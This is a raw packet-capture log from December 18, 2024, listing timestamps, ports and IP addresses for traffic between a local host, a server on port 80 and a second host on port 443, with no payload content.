Dec 18, 2024 13:38:38.991827965 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.991880894 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.992887974 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.992933989 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.994044065 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.994056940 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.994107008 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.994976997 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.994990110 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.995029926 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.995060921 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.995811939 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.995824099 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.995872974 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.996910095 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.996923923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.996958971 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.996989012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.997981071 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.997994900 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.998038054 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.999643087 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.999655962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.999701977 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.000602961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.000616074 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.000627041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.000659943 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.000895023 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.001275063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.001286983 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.001328945 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.002504110 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.002516985 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.002556086 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.002592087 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.003479958 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.003494024 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.003536940 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.004626036 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.004638910 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.004651070 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.004682064 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.004698992 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.005657911 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.005671978 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.005728006 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.006772041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.006784916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.006828070 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.007940054 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.007952929 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.008003950 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.008959055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.008971930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.009010077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.010077953 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.010091066 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.010107040 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.010154963 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.010190010 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.011127949 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.011147976 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.011209011 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.012250900 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.012263060 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.012310982 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.013350964 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.013406038 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.014482021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.014528990 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.015554905 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.015567064 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.015604019 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.015616894 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.016665936 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.016679049 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.016725063 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.018035889 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.018054962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.018066883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.018090963 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.018121004 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.018887997 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.018901110 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.018963099 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.019963026 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.019974947 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.020029068 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.021099091 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.021119118 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.021161079 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.021188974 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.022138119 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.022150993 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.022161961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.022188902 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.022212029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.024233103 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.024246931 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.024296045 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.024513960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.024527073 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.024564028 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.039848089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.040066957 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.040191889 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.041035891 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.041048050 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.041104078 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.041827917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.041840076 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.041888952 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.042892933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.042906046 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.042963028 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.042990923 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.043859005 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.043873072 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.043919086 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.044864893 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.044877052 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.044931889 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.045875072 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.045888901 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.045911074 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.045933008 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.169992924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.170469999 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.170638084 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.170814037 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.170864105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.171222925 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.171268940 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.171518087 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.171561003 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.171952009 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.172525883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.172538996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.172565937 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.172599077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.173263073 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.173305988 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.173645973 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.173692942 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.173966885 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.173980951 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.174012899 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.174029112 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.175374985 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.175570011 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.175582886 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.175625086 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.175653934 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.176522970 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.177134991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.177146912 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.177187920 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.178212881 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.178225040 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.178272963 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.178941011 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.178952932 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.178991079 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.179913998 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.179934025 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.179976940 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.181103945 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.181117058 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.181150913 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.181912899 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.181926966 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.181984901 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.182897091 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.182909966 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.182955027 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.183897972 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.183911085 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.183957100 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.184942961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.184956074 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.184994936 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.185933113 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.185945988 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.185998917 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.186821938 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.186835051 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.186868906 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.186907053 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.197988033 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.198390961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.198462009 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.198865891 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.198878050 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.198918104 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.199929953 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.199940920 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.199982882 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.200714111 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.200727940 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.200759888 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.201766968 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.201781034 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.201812983 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.202841043 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.202853918 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.202883005 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.202908039 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.203963041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.203975916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.203985929 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.204020023 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.205010891 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.205024004 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.205056906 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.206150055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.206161976 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.206201077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.207257032 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.207269907 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.207317114 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.208353996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.208367109 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.208376884 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.208410025 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.208425045 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.209429979 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.209445000 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.209491968 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.210599899 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.210617065 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.210664034 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.211610079 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.211623907 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.211664915 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.212719917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.212733030 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.212778091 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.213922024 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.213934898 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.213944912 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.213978052 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.213989973 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.215055943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.215070009 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.215114117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.216200113 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.216212034 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.216258049 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.217206001 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.217220068 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.217253923 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.218341112 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.218353987 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.218364954 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.218393087 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.218420982 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.219296932 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.219357967 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.219403982 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.220403910 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.220424891 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.220472097 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.221565008 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.221577883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.221616030 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.222799063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.222812891 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.222851992 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.223711014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.223725080 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.223737955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.223768950 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.223783016 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.224869013 CET	443	49717	104.21.23.76	192.168.2.8
Dec 18, 2024 13:38:39.224970102 CET	443	49717	104.21.23.76	192.168.2.8
Dec 18, 2024 13:38:39.225040913 CET	49717	443	192.168.2.8	104.21.23.76
Dec 18, 2024 13:38:39.225342035 CET	49717	443	192.168.2.8	104.21.23.76
Dec 18, 2024 13:38:39.225366116 CET	443	49717	104.21.23.76	192.168.2.8
Dec 18, 2024 13:38:39.225377083 CET	49717	443	192.168.2.8	104.21.23.76
Dec 18, 2024 13:38:39.225383043 CET	443	49717	104.21.23.76	192.168.2.8
Dec 18, 2024 13:38:39.232824087 CET	49719	443	192.168.2.8	104.21.23.76
Dec 18, 2024 13:38:39.232851028 CET	443	49719	104.21.23.76	192.168.2.8
Dec 18, 2024 13:38:39.232929945 CET	49719	443	192.168.2.8	104.21.23.76
Dec 18, 2024 13:38:39.233237028 CET	49719	443	192.168.2.8	104.21.23.76
Dec 18, 2024 13:38:39.233253002 CET	443	49719	104.21.23.76	192.168.2.8
Dec 18, 2024 13:38:39.242903948 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.243237019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.243293047 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.251333952 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.251780033 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.252437115 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.252450943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.252491951 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.253950119 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.253964901 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.254013062 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.255191088 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.255203962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.255214930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.255245924 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.255259037 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.256478071 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.256490946 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.256571054 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.257154942 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.257168055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.257210970 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.361682892 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.361885071 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.361960888 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.362020016 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.362363100 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.362413883 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.362672091 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.362720966 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.363087893 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.363137007 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.363571882 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.363585949 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.363622904 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.364577055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.364631891 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.365139008 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.365187883 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.365545034 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.365557909 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.365595102 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.366513014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.366588116 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.367037058 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.367085934 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.367528915 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.367542028 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.367573977 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.368541002 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.369014025 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.369077921 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.369505882 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.369519949 CET	80	49715	31.41.244.11	192.168.2.8
